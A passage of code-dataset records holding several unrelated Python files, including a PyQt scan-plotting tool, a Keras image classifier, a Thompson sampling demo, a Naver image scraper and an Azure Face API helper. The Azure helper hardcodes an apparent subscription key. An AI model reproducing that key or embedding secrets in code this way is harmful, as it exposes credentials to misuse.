# number of pixels occupied by smoke or fire in the image\n            print(distance_to_fire)\n            '''\n            Implement some kind of PUSH notification when the model returns zero.\n            With more data, a segmentation model could be trained to estimate the distance to the fire\n            and the approximate area of the burning zone more precisely.\n            '''\n\n\nif __name__=='__main__':\n    video_analyze(video_path='', model_path='')","sub_path":"app/api_cv.py","file_name":"api_cv.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"208401215","text":"def trees(landscape, right, down):\n    r = right\n    d = down\n    tree_count = 0\n    while d < len(landscape):\n        t = landscape[d][r % len(landscape[d])]\n\n        if t == '.':\n            t = t\n        elif t == '#':\n            tree_count += 1\n        else:\n            print(\"No good! 
Saw char {}\".format(t))\n print (\"{}, {}, {}, {}\".format(d, r % (len(landscape[d])), t, tree_count ))\n d += down\n r += right\n return tree_count\n\nlandscape = []\n\nwith open(\"input\") as f:\n for l in f:\n landscape.append([])\n for c in l:\n if c != \"\\n\" and c != \"\\r\":\n landscape[-1].append(c)\n\nprint(trees(landscape, 3, 1))\n","sub_path":"2020/day/3/part/1/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448292435","text":"import abc\nfrom typing import Any, Dict, Iterable, List, Optional\n\nimport pkg_resources\nfrom termcolor import colored\n\nimport determined\nimport determined.deploy\nfrom determined.deploy.aws import constants\n\n\nclass DeterminedDeployment(metaclass=abc.ABCMeta):\n template_parameter_keys = [] # type: List[str]\n template = None # type: Optional[str]\n\n master_info = \"Configure the Determined CLI: \" + colored(\n \"export DET_MASTER={master_ip}\", \"yellow\"\n )\n ui_info = \"View the Determined UI: \" + colored(\"http://{master_ip}:8080\", \"blue\")\n logs_info = \"View Logs at: \" + colored(\n \"https://{region}.console.aws.amazon.com/cloudwatch/home?\"\n \"region={region}#logStream:group={log_group}\",\n \"blue\",\n )\n ssh_info = \"SSH to master Instance: \" + colored(\n \"ssh -i ubuntu@{master_ip}\", \"yellow\"\n )\n\n def __init__(self, parameters: Dict[str, Any]) -> None:\n assert self.template is not None\n self.template_path = pkg_resources.resource_filename(\n constants.misc.TEMPLATE_PATH, self.template\n )\n self.parameters = parameters\n\n @abc.abstractmethod\n def deploy(self) -> None:\n pass\n\n def print(self) -> None:\n with open(self.template_path) as f:\n print(f.read())\n\n def consolidate_parameters(self) -> List[Dict[str, Any]]:\n return [\n {\"ParameterKey\": k, \"ParameterValue\": str(self.parameters[k])}\n for k in self.parameters.keys()\n if self.parameters[k] and k in self.template_parameter_keys\n ]\n\n def before_deploy_print(self) -> None:\n cluster_id = self.parameters[constants.cloudformation.CLUSTER_ID]\n aws_region = self.parameters[constants.cloudformation.BOTO3_SESSION].region_name\n version = (\n self.parameters[constants.cloudformation.VERSION]\n if self.parameters[constants.cloudformation.VERSION]\n else determined.__version__\n )\n keypair = self.parameters[constants.cloudformation.KEYPAIR]\n\n print(f\"Determined Version: {version}\")\n print(f\"Stack Name: {cluster_id}\")\n print(f\"AWS Region: {aws_region}\")\n print(f\"Keypair: {keypair}\")\n\n @property\n def info_partials(self) -> Iterable[str]:\n return (\n self.master_info,\n self.ui_info,\n self.logs_info,\n self.ssh_info,\n )\n\n def print_output_info(self, **kwargs: str) -> None:\n print(\"\\n\".join(self.info_partials).format(**kwargs))\n","sub_path":"harness/determined/deploy/aws/deployment_types/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"75650401","text":"from keras.models import Sequential, load_model\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.utils import np_utils\nimport keras, sys\nimport numpy as np\nfrom PIL import Image\n\n\nclasses = [\"monkey\", \"cat\", \"dog\"]\nnum_classes = len(classes)\nimage_size = 50, 50\n\ndef build_model():\n model = Sequential()\n model.add(Conv2D(32,(3,3), 
padding='same', input_shape=(50,50,3)))\n model.add(Activation('relu'))\n model.add(Conv2D(32,(3,3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.25))\n\n model.add(Conv2D(64,(3,3), padding='same'))\n model.add(Activation('relu'))\n model.add(Conv2D(64,(3,3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2,2)))\n model.add(Dropout(0.25))\n\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation('relu'))\n model.add(Dropout(0.5))\n model.add(Dense(3))\n model.add(Activation('softmax'))\n\n opt = keras.optimizers.RMSprop(lr=0.0001, decay=1e-6)\n\n model.compile(loss='categorical_crossentropy', \\\n optimizer=opt, metrics=['accuracy'])\n\n model = load_model('./animal_cnn_plus.h5')\n\n return model\n\ndef main():\n im = Image.open(sys.argv[1])\n im = im.convert('RGB')\n im = im.resize(image_size)\n data = np.asarray(im)\n X = []\n X.append(data)\n X = np.array(X)\n model = build_model()\n\n result = model.predict([X])[0]\n predicted = result.argmax()\n percentage = int(result[predicted] * 100)\n print('{0} ({1} %)'.format(classes[predicted], percentage))\n\nif __name__ == '__main__':\n main()\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"233326768","text":"import logging\nimport time\nfrom typing import Union, List, Optional\n\nimport numpy as np\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nfrom matplotlib.axes import Axes\nfrom matplotlib.backend_bases import key_press_handler, KeyEvent\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT, FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\nfrom matplotlib.lines import Line2D\nfrom sastool.misc.basicfit import findpeak_single, findpeak_asymmetric\n\nfrom .scangraph_ui import Ui_MainWindow\nfrom .signalsmodel import SignalModel\nfrom ..plotimage import PlotImage\nfrom ...core.mixins import ToolWindow\nfrom ....core.devices import Motor\nfrom ....core.instrument.instrument import Instrument\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass ScanGraph(QtWidgets.QMainWindow, Ui_MainWindow, ToolWindow):\n def __init__(self, *args, **kwargs):\n credo = kwargs.pop('credo')\n QtWidgets.QMainWindow.__init__(self, *args, **kwargs)\n self.setupToolWindow(credo)\n self._data = None\n self._lastpeakposition = None\n self.setupUi(self)\n\n def setupUi(self, MainWindow):\n Ui_MainWindow.setupUi(self, MainWindow)\n self.figure = Figure()\n self.canvas = FigureCanvasQTAgg(self.figure)\n self.figureLayout.insertWidget(0, self.canvas)\n self.canvas.setSizePolicy(\n QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding))\n self.figuretoolbar = NavigationToolbar2QT(self.canvas, self.centralWidget())\n self.canvas.mpl_connect('key_press_event', self.onCanvasKeyPress)\n self.canvas.setFocusPolicy(QtCore.Qt.ClickFocus)\n self.figureLayout.insertWidget(0, self.figuretoolbar)\n self.axes = self.figure.add_subplot(1, 1, 1)\n self.axes.grid(True, which='both')\n self._curvehandles = []\n self.cursorLeftButton.clicked.connect(\n lambda: self.cursorSlider.triggerAction(self.cursorSlider.SliderSingleStepSub))\n self.cursorRightButton.clicked.connect(\n lambda: self.cursorSlider.triggerAction(self.cursorSlider.SliderSingleStepAdd))\n self.cursorHomeButton.clicked.connect(\n lambda: self.cursorSlider.triggerAction(self.cursorSlider.SliderToMinimum))\n 
self.cursorEndButton.clicked.connect(lambda: self.cursorSlider.triggerAction(self.cursorSlider.SliderToMaximum))\n self.cursorSlider.valueChanged.connect(self.cursorMoved)\n self.actionCursor_to_Maximum.triggered.connect(self.cursorToMaximum)\n self.actionCursor_to_Minimum.triggered.connect(self.cursorToMinimum)\n self.actionFit_negative_Gaussian.triggered.connect(lambda: self.fit('Gaussian', -1))\n self.actionFit_positive_Gaussian.triggered.connect(lambda: self.fit('Gaussian', +1))\n self.actionFit_negative_Lorentzian.triggered.connect(lambda: self.fit('Lorentzian', -1))\n self.actionFit_positive_Lorentzian.triggered.connect(lambda: self.fit('Lorentzian', +1))\n self.actionFit_asymmetric_negative_peak.triggered.connect(lambda: self.fit('Lorentzian', -1, True))\n self.actionFit_symmetric_negative_peak.triggered.connect(lambda: self.fit('Lorentzian', -1, False))\n self.actionFit_asymmetric_peak.triggered.connect(lambda: self.fit('Lorentzian', 1, True))\n self.actionFit_symmetric_peak.triggered.connect(lambda: self.fit('Lorentzian', 1, False))\n self.actionAutoScale.toggled.connect(self.autoscale)\n self.actionShowLegend.toggled.connect(self.drawLegend)\n self.hideAllButton.clicked.connect(lambda: self.model.setVisible(None, False))\n self.showAllButton.clicked.connect(lambda: self.model.setVisible(None, True))\n self.actionReplot.triggered.connect(self.replot)\n self.actionMotor_to_peak.setEnabled(False)\n self.actionMotor_to_cursor.setEnabled(True)\n self.actionMotor_to_peak.triggered.connect(self.onMotorToPeak)\n self.actionMotor_to_cursor.triggered.connect(self.onMotorToCursor)\n self.actionShow_2D.toggled.connect(self.replot)\n self.setCursorRange()\n self.canvas.setFocus(QtCore.Qt.OtherFocusReason)\n self.canvas.mpl_connect('resize_event', self.onCanvasResize)\n\n self.signalsTreeView\n\n def onCanvasResize(self, event):\n self.figure.tight_layout()\n self.canvas.draw()\n\n def onCanvasKeyPress(self, event:KeyEvent):\n logger.debug('Key pressed on canvas: {}'.format(event.key))\n if event.key == 'left':\n self.cursorSlider.triggerAction(self.cursorSlider.SliderSingleStepSub)\n elif event.key == 'right':\n self.cursorSlider.triggerAction(self.cursorSlider.SliderSingleStepAdd)\n elif event.key in ['shift+left', 'pagedown']:\n self.cursorSlider.triggerAction(self.cursorSlider.SliderPageStepSub)\n elif event.key in ['shift+right', 'pageup']:\n self.cursorSlider.triggerAction(self.cursorSlider.SliderPageStepAdd)\n else:\n key_press_handler(event, self.canvas, self.figuretoolbar)\n return True\n\n def fit(self, functiontype, sign, asymmetric=False):\n xmin, xmax, ymin, ymax = self.axes.axis()\n x = self._data[self.abscissaName()]\n y = self._data[self.selectedSignal()]\n idx = np.logical_and(np.logical_and(x >= xmin, x <= xmax),\n np.logical_and(y >= ymin, y <= ymax))\n if idx.sum() < 5:\n QtWidgets.QMessageBox.critical(\n self, \"Fitting error\",\n \"Error while peak fitting: not enough points in the current view \"\n \"from the currently selected signal ({})\".format(self.selectedSignal()))\n return\n return_x = np.linspace(x.min(), x.max(), 1000)\n if asymmetric:\n if sign>0:\n pos, hwhm1, hwhm2, baseline, amplitude, yfit = findpeak_asymmetric(x[idx], y[idx], np.ones_like(y[idx]), curve=functiontype, return_x=return_x)\n else:\n pos, hwhm1, hwhm2, baseline, amplitude, yfit = findpeak_asymmetric(x[idx], -y[idx], np.ones_like(y[idx]), curve=functiontype, return_x=return_x)\n yfit = -yfit\n baseline = -baseline\n amplitude = -amplitude\n else:\n pos, hwhm, baseline, amplitude, yfit = 
findpeak_single(x[idx], y[idx], curve=functiontype, signs=(sign,), return_x=return_x)\n for attr in ['_fitcurvehandle', '_peaktexthandle']:\n try:\n getattr(self, attr).remove()\n delattr(self, attr)\n except AttributeError:\n pass\n self._fitcurvehandle = self.axes.plot(return_x, yfit, 'r--')[0]\n if sign < 0:\n va = 'top'\n if sign > 0:\n va = 'bottom'\n self._peaktexthandle = self.axes.text(float(pos), float(baseline) + float(amplitude), pos.tostring(), ha='center', va=va)\n self._lastpeakposition = pos\n self.actionMotor_to_peak.setEnabled(True)\n self.canvas.draw_idle()\n\n def drawLegend(self):\n if self.actionShowLegend.isChecked():\n handles = [c for c in self._curvehandles if self.model.visible(c.get_label())]\n labels = [c.get_label() for c in handles]\n self.axes.legend(handles, labels, loc='best')\n else:\n self.axes.legend().remove()\n self.canvas.draw_idle()\n\n def autoscale(self):\n self.axes.autoscale(self.actionAutoScale.isChecked(), tight=True)\n if self.actionAutoScale.isChecked():\n self.axes.relim(True)\n self.axes.autoscale_view(True, True, True)\n self.figuretoolbar.update()\n self.canvas.draw_idle()\n\n def cursorToMaximum(self):\n self.cursorSlider.setValue(np.argmax(self._data[self.selectedSignal()]))\n\n def cursorToMinimum(self):\n self.cursorSlider.setValue(np.argmin(self._data[self.selectedSignal()]))\n\n def selectedSignal(self):\n return self._data.dtype.names[1:][self.signalsTreeView.selectionModel().selectedRows()[0].row()]\n\n def signalsTreeViewSelectionChanged(self, current: QtCore.QModelIndex,\n previous: QtCore.QModelIndex):\n for h in self._curvehandles:\n h.set_lw(1)\n self._curvehandles[current.row()].set_lw(3)\n self.drawLegend()\n self.canvas.draw_idle()\n\n def cursorMoved(self, position):\n self.cursorLeftButton.setEnabled(position > 0)\n self.cursorRightButton.setEnabled(position < self._datalength - 1)\n self.cursorHomeButton.setEnabled(position > 0)\n self.cursorEndButton.setEnabled(position < self._datalength - 1)\n try:\n self.actionMotor_to_cursor.setEnabled(not self.credo.motors[self.abscissaName()].ismoving())\n except KeyError:\n self.actionMotor_to_cursor.setEnabled(False)\n self.draw2D()\n self.drawScanCursor()\n\n def drawScanCursor(self):\n if self.isScanRunning():\n return False\n assert isinstance(self.axes, Axes)\n cursorposition = self.cursorSlider.value()\n if hasattr(self, '_cursorhandle'):\n self._cursorhandle.remove()\n del self._cursorhandle\n self._cursorhandle = self.axes.axvline(self._data[self.abscissaName()][cursorposition], color='black',\n alpha=0.8, lw=3)\n self.cursorPositionLabel.setText('{:.4f}'.format(self._data[self.abscissaName()][cursorposition]))\n self.requestRedraw()\n\n def replot(self):\n t0 = time.monotonic()\n if self._data is None:\n return False\n assert isinstance(self._data, np.ndarray)\n # self.axes.set_color_cycle(None)\n if hasattr(self, '_fitcurvehandle'):\n self._fitcurvehandle.remove()\n del self._fitcurvehandle\n if hasattr(self, '_peaktexthandle'):\n self._peaktexthandle.remove()\n del self._peaktexthandle\n if not hasattr(self, '_curvehandles'):\n self._curvehandles = []\n if not self._curvehandles:\n for signal in self._data.dtype.names[1:]:\n self._curvehandles.extend(\n self.axes.plot(self._data[self.abscissaName()][:self._datalength],\n self._data[signal][:self._datalength], '.-', label=signal))\n else:\n abscissaname = self.abscissaName()\n abscissa = self._data[abscissaname][:self._datalength]\n for signal, handle in zip(self._data.dtype.names[1:], self._curvehandles):\n 
handle.set_xdata(abscissa)\n handle.set_ydata(self._data[signal][:self._datalength] * self.model.factor(signal))\n handle.set_lw(1)\n try:\n self._curvehandles[self.signalsTreeView.selectedIndexes()[0].row()].set_lw(3)\n except IndexError:\n pass\n self.autoscale()\n self.drawLegend()\n self.drawScanCursor()\n self.draw2D()\n self.requestRedraw()\n\n def setCurvesVisibility(self):\n for c in self._curvehandles:\n assert isinstance(c, Line2D)\n c.set_visible(self.model.visible(c.get_label()))\n self.drawLegend()\n self.autoscale()\n self.requestRedraw()\n\n def updateCursorVisibility(self):\n for widget in [self.cursorEndButton, self.cursorHomeButton, self.cursorLeftButton,\n self.cursorRightButton, self.cursorSlider, self.cursorPositionLabel]:\n widget.setEnabled(self._data is not None)\n widget.setVisible(self._data is not None)\n\n def setCursorRange(self):\n self.updateCursorVisibility()\n if self._data is None:\n return\n self.cursorSlider.setMinimum(0)\n self.cursorSlider.setMaximum(self._datalength - 1)\n self.cursorSlider.setValue((self._datalength - 1) // 2)\n\n def setCurve(self, scandata: Union[np.ndarray, List[str]], datalength: Optional[int] = None):\n \"\"\"Set the scan data.\n\n Inputs:\n scandata: np.ndarray or a list of strings.\n A one-dimensional, structured numpy array. The field names are\n the labels of the individual signals. The first field is the\n abscissa. If a list of strings, an empty array will be constructed\n containing space for `datalength` points.\n datalength: positive integer\n The expected length of the data. If None, it will be set to the\n number of elements in scandata.\n If this instance of ScanGraph is meant to represent a scan\n currently in progress, scandata must be an array with enough\n space to fit all scan points acquired during the measurement,\n and datalength must be the number of already acquired points,\n zero if the scan has just been started and no point has been\n recorded yet. 
`datalength > len(scandata)` is an error.\n \"\"\"\n if not isinstance(scandata, np.ndarray):\n logger.debug(scandata)\n logger.debug(datalength)\n scandata = np.zeros(datalength, dtype=list(zip(scandata, [np.double] * len(scandata))))\n datalength = 0\n if datalength is None:\n datalength = len(scandata)\n if datalength > len(scandata):\n raise ValueError(\n 'Argument `datalength` must not be larger than the number of points in argument `scandata`.')\n self._data = scandata\n self._datalength = datalength\n self.axes.set_xlabel(self.abscissaName())\n self.setCursorRange()\n self.model = SignalModel(signals=self._data.dtype.names[1:])\n self.signalsTreeView.setModel(self.model)\n self.model.dataChanged.connect(self.signalsTreeModelChanged)\n self.signalsTreeView.selectionModel().currentChanged.connect(self.signalsTreeViewSelectionChanged)\n self.signalsTreeView.selectionModel().select(self.model.index(1, 0),\n QtCore.QItemSelectionModel.SelectCurrent | QtCore.QItemSelectionModel.Rows)\n for col in range(self.signalsTreeView.model().columnCount()):\n self.signalsTreeView.resizeColumnToContents(col)\n self.setCursorRange()\n self.replot()\n self.setCurvesVisibility()\n\n def signalsTreeModelChanged(self, idxfrom: QtCore.QModelIndex, idxto: QtCore.QModelIndex):\n for col in range(self.signalsTreeView.model().columnCount()):\n self.signalsTreeView.resizeColumnToContents(col)\n if idxfrom.column() == 0 or idxto.column() == 0:\n self.setCurvesVisibility()\n if idxfrom.column() == 1 or idxto.column() == 1:\n self.replot()\n return True\n\n def appendScanPoint(self, scanpoint):\n \"\"\"Append a newly acquired scan point.\n\n Inputs:\n scanpoint: tuple\n A tuple carrying the newly registered values for all signals,\n including the abscissa.\"\"\"\n if self._datalength >= len(self._data):\n raise ValueError('Cannot append to scan curve: no space left in the array.')\n self._data[self._datalength] = scanpoint\n self._datalength += 1\n if not self.isScanRunning():\n self.truncateScan()\n self.replot()\n\n def truncateScan(self):\n \"\"\"Remove unused space from the data array, thus considering this scan\n finished.\n \"\"\"\n self._data = self._data[:self._datalength]\n self.setCursorRange()\n if self.credo is not None:\n assert isinstance(self.credo, Instrument)\n try:\n motor = self.credo.motors[self.abscissaName()]\n assert isinstance(motor, Motor)\n except KeyError:\n pass\n else:\n self.actionMotor_to_cursor.setEnabled(not motor.ismoving())\n self.actionMotor_to_peak.setEnabled((not motor.ismoving()) and (self._lastpeakposition is not None))\n self.requireDevice('Motor_' + self.abscissaName())\n\n def onMotorStart(self, motor: Motor):\n self.actionMotor_to_cursor.setEnabled(False)\n self.actionMotor_to_peak.setEnabled(False)\n\n def onMotorStop(self, motor: Motor, targetpositionreached: bool):\n self.actionMotor_to_cursor.setEnabled(True)\n self.actionMotor_to_peak.setEnabled(self._lastpeakposition is not None)\n\n def cleanup(self):\n logger.debug('Cleaning up scangraph {}'.format(self.windowTitle()))\n del self._data\n super().cleanup()\n\n def abscissaName(self):\n return self._data.dtype.names[0]\n\n def isScanRunning(self):\n return self._datalength < len(self._data)\n\n def __len__(self):\n return self._datalength\n\n def requestRedraw(self):\n self.canvas.draw_idle()\n\n def onMotorToPeak(self):\n motor = self.credo.motors[self.abscissaName()]\n assert isinstance(motor, Motor)\n try:\n motor.moveto(self._lastpeakposition.val)\n except Exception as exc:\n 
QtWidgets.QMessageBox.critical(self, 'Cannot move motor',\n                                           'Cannot move motor {}: {}'.format(self.abscissaName(), exc.args[0]))\n\n    def onMotorToCursor(self):\n        motor = self.credo.motors[self.abscissaName()]\n        assert isinstance(motor, Motor)\n        try:\n            motor.moveto(self._data[self.abscissaName()][self.cursorSlider.value()])\n        except Exception as exc:\n            QtWidgets.QMessageBox.critical(self, 'Cannot move motor',\n                                           'Cannot move motor {}: {}'.format(self.abscissaName(), exc.args[0]))\n\n    def draw2D(self):\n        if not self.actionShow_2D.isChecked():\n            return\n        plot2d = PlotImage.get_lastinstance()\n        plot2d.show()\n        if len(self._data) == self._datalength:\n            cursor = self.cursorSlider.value()\n        else:\n            cursor = self._datalength - 1\n        if cursor < 0:\n            return\n        fsn = self._data['FSN'][cursor]\n        exp = self.credo.services['filesequence'].load_exposure(self.credo.config['path']['prefixes']['scn'], int(fsn))\n        plot2d.setExposure(exp)\n\n    def closeEvent(self, event: QtGui.QCloseEvent):\n        if self.isScanRunning():\n            msg = QtWidgets.QMessageBox.warning(\n                self, 'Confirm close window',\n                'A scan measurement is still running. Do you really want to close the window?',\n                QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No\n            )\n            # warning() returns a StandardButton, not a ButtonRole; abort the close unless Yes was clicked\n            if msg != QtWidgets.QMessageBox.Yes:\n                event.ignore()\n                return\n        return ToolWindow.closeEvent(self, event)\n","sub_path":"cct/qtgui/core/scangraph/scangraph.py","file_name":"scangraph.py","file_ext":"py","file_size_in_byte":18930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"9102551","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 19 23:42:19 2020\n\n@author: jcantero\n\"\"\"\n\n# Thompson Sampling\n\n# Import the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Load the dataset\ndataset = pd.read_csv(\"Ads_CTR_Optimisation.csv\")\n\n# Thompson Sampling algorithm\nimport random\nN = 10000\nd = 10\n\nnumberOfRewards1 = [0] * d\nnumberOfRewards0 = [0] * d\n\n# Selected ads\nadsSelected = [] \n\ntotalReward = 0;\n\nfor n in range(0, N):\n    maxRandom = 0\n    ad = 0\n\n    for i in range(0, d):\n        randomBeta = random.betavariate(numberOfRewards1[i] + 1, numberOfRewards0[i] + 1)\n\n        if randomBeta > maxRandom:\n            maxRandom = randomBeta\n            ad = i\n\n    adsSelected.append(ad)\n\n\n    reward = dataset.values[n, ad]\n    if reward == 1:\n        numberOfRewards1[ad] = numberOfRewards1[ad] + 1;\n    else:\n        numberOfRewards0[ad] = numberOfRewards0[ad] + 1;\n\n    totalReward = totalReward + reward\n\n# Histogram of results\nplt.hist(adsSelected)\nplt.title(\"Histogram of ads\")\nplt.xlabel(\"Ad ID\")\nplt.ylabel(\"Ad view frequency\")\nplt.show()\n","sub_path":"datasets/Part 6 - Reinforcement Learning/Section 33 - Thompson Sampling/thompson_sampling_jcantero.py","file_name":"thompson_sampling_jcantero.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"428192959","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 13 18:36:41 2014\n\n@author: favi\n\"\"\"\n\nimport math\n\nfrom PyQt4 import QtCore, QtGui\n\n\nclass FsmTransition(QtGui.QGraphicsLineItem):\n    def __init__(self, startItem, endItem, parent=None, scene=None):\n        super(FsmTransition, self).__init__(parent, scene)\n\n        self.arrowHead = QtGui.QPolygonF()\n\n        self.myStartItem = startItem\n        self.myEndItem = endItem\n        
self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, True)\n self.myColor = QtCore.Qt.black\n self.setPen(QtGui.QPen(self.myColor, 1, QtCore.Qt.SolidLine,\n QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin))\n\n def setColor(self, color):\n self.myColor = color\n\n def startItem(self):\n return self.myStartItem\n\n def endItem(self):\n return self.myEndItem\n\n def boundingRect(self):\n extra = (self.pen().width() + 20) / 2.0\n p1 = self.line().p1()\n p2 = self.line().p2()\n return QtCore.QRectF(p1, QtCore.QSizeF(p2.x() - p1.x(), p2.y() - p1.y())).normalized().adjusted(-extra, -extra, extra, extra)\n\n def shape(self):\n path = super(FsmTransition, self).shape()\n path.addPolygon(self.arrowHead)\n return path\n\n def updatePosition(self):\n# line = QtCore.QLineF(self.mapFromItem(self.myStartItem, 0, 0), \n# self.mapFromItem(self.myEndItem, 0, 0))\n line = QtCore.QLineF(self.myStartItem.pos(), \n self.myEndItem.pos()) \n self.setLine(line)\n self.update(self.boundingRect())\n\n def paint(self, painter, option, widget=None):\n if (self.myStartItem.collidesWithItem(self.myEndItem)):\n return\n\n myStartItem = self.myStartItem\n myEndItem = self.myEndItem\n myColor = self.myColor\n myPen = self.pen()\n myPen.setColor(self.myColor)\n arrowSize = 20.0\n \n painter.setPen(myPen)\n painter.setBrush(self.myColor)\n\n centerLine = QtCore.QLineF(myStartItem.pos(), myEndItem.pos())\n uv = centerLine.unitVector() \n endPos = myEndItem.pos()-QtCore.QPointF(uv.dx()*myEndItem.diameter/2, uv.dy()*myEndItem.diameter/2)\n \n # endPolygon = myEndItem.polygon()\n # p1 = endPolygon.first() + myEndItem.pos()\n\n # intersectPoint = QtCore.QPointF()\n # for i in endPolygon:\n # p2 = i + myEndItem.pos()\n # polyLine = QtCore.QLineF(p1, p2)\n # intersectType = polyLine.intersect(centerLine, intersectPoint)\n # if intersectType == QtCore.QLineF.BoundedIntersection:\n # break\n # p1 = p2\n \n #self.setLine(QtCore.QLineF(intersectPoint, myStartItem.pos()))\n self.setLine(QtCore.QLineF(endPos, myStartItem.pos()))\n #self.setLine(centerLine)\n line = self.line()\n \n \n # \n# angle = math.acos(line.dx() / line.length())\n# if line.dy() >= 0:\n# angle = (math.pi * 2.0) - angle\n# arrowAperture = math.pi/3.0 #angle \n# arrowP1 = line.p1() + QtCore.QPointF(math.sin(angle + arrowAperture) * arrowSize,\n# math.cos(angle + arrowAperture) * arrowSize)\n# arrowC1 = line.p1() - QtCore.QPointF(uv.dx()*arrowSize/2, uv.dy()*arrowSize/2) \n# arrowP2 = line.p1() + QtCore.QPointF(math.sin(angle + math.pi - arrowAperture) * arrowSize,\n# math.cos(angle + math.pi - arrowAperture) * arrowSize)\n \n angle = line.angle() #in degrees\n arrowAperture = 20 #degrees \n arrowP1 = QtCore.QLineF.fromPolar(arrowSize,angle+arrowAperture).translated(line.p1()).p2() \n arrowC1 = QtCore.QLineF.fromPolar(arrowSize/2,angle).translated(line.p1()).p2() \n arrowP2 = QtCore.QLineF.fromPolar(arrowSize,angle-arrowAperture).translated(line.p1()).p2()\n\n self.arrowHead.clear()\n for point in [line.p1(), arrowP1, arrowC1, arrowP2]:\n self.arrowHead.append(point)\n\n painter.drawLine(line)\n painter.drawPolygon(self.arrowHead)\n if self.isSelected():\n painter.setPen(QtGui.QPen(myColor, 1, QtCore.Qt.DashLine))\n myLine = QtCore.QLineF(line)\n myLine.translate(0, 4.0)\n painter.drawLine(myLine)\n myLine.translate(0,-8.0)\n painter.drawLine(myLine)\n \nif __name__ == '__main__':\n import sys\n from MainWindow import MainWindow\n from PyQt4.QtTest import QTest\n from PyQt4.QtCore import Qt\n \n app = QtGui.QApplication(sys.argv)\n\n\n mainWindow = MainWindow()\n 
mainWindow.setGeometry(100, 100, 800, 500)\n    mainWindow.show()\n\n    QTest.mouseClick(mainWindow.addStateButton, Qt.LeftButton)\n    QTest.mouseClick(mainWindow.view.viewport(), Qt.LeftButton, Qt.NoModifier, QtCore.QPoint(400,200))\n    QTest.mouseClick(mainWindow.view.viewport(), Qt.LeftButton, Qt.NoModifier, QtCore.QPoint(100,250))\n    QTest.mouseClick(mainWindow.linePointerButton, Qt.LeftButton)\n    QTest.mousePress(mainWindow.view.viewport(), Qt.LeftButton, Qt.NoModifier, QtCore.QPoint(400,200))\n    QTest.mouseMove(mainWindow.view.viewport(), QtCore.QPoint(100,250))\n    QTest.mouseRelease(mainWindow.view.viewport(), Qt.LeftButton, Qt.NoModifier, QtCore.QPoint(100,250))\n    \n    sys.exit(app.exec_()) ","sub_path":"FsmTransition.py","file_name":"FsmTransition.py","file_ext":"py","file_size_in_byte":5497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"404923793","text":"\nfrom bs4 import BeautifulSoup\nfrom urllib import request\nfrom urllib import parse\n\nimport sys,io,os\n\n\n\nsort=input('Image to download: ')\n\nurl='https://search.naver.com/search.naver?sm=tab_hty.top&where=image&query='\n\n#print(var)\nparse_quote = parse.quote(sort)\n\n#print(parse_quote)\n\n\nimg_url= url+parse_quote\n\n\nsavePath='D:\\\\pythonProject\\\\project\\\\day20190518\\\\img\\\\' +sort +'\\\\'\n\ntry:\n    os.makedirs(savePath)\nexcept:\n    print('Fail')\n\n\nhtml=request.urlopen(img_url).read() ## run this to read the entire matching tag\n\n#print(html)\n\nsoup = BeautifulSoup(html,'html.parser')\n\n#print(soup) ## uncommenting this raises an error\n\nlist=soup.find_all('img', class_='_img')\n#print(list)\n#print(list[0])\n#print(len(list))\n\nfor idx, img in enumerate(list,1):\n    print(img['data-source']) ## the URL of each image\n    saveName=savePath + sort + str(idx) + '.png'\n    #print(saveName)\n\n    request.urlretrieve(img['data-source'],saveName) ## fetch each URL and save it as a file\n\n\nprint('success!!!!')\n","sub_path":"8/downloadEx03_1.py","file_name":"downloadEx03_1.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"202881426","text":"import os, requests\nfrom azure.cognitiveservices.vision.face import FaceClient\nfrom msrest.authentication import CognitiveServicesCredentials\n\n\nheaders = {\n    'Ocp-Apim-Subscription-Key': '16287767a9cc49e2a3367b0225e2d2bd',\n}\n\nKEY = '16287767a9cc49e2a3367b0225e2d2bd'\n\nENDPOINT = 'https://testproj.cognitiveservices.azure.com/'\n\n\ndef detectedFace(image):\n    face_client = FaceClient(ENDPOINT, CognitiveServicesCredentials(KEY))\n\n    faces_on_image = []\n\n    single_face_image_url = image\n    single_image_name = os.path.basename(single_face_image_url)\n    detected_faces = face_client.face.detect_with_url(url=single_face_image_url)\n    if not detected_faces:\n        raise Exception('No face detected from image {}'.format(single_image_name))\n    \n    for face in detected_faces:\n        faces_on_image.append(face.face_id)\n\n    return faces_on_image\n\n\ndef createPersonGroup(name, 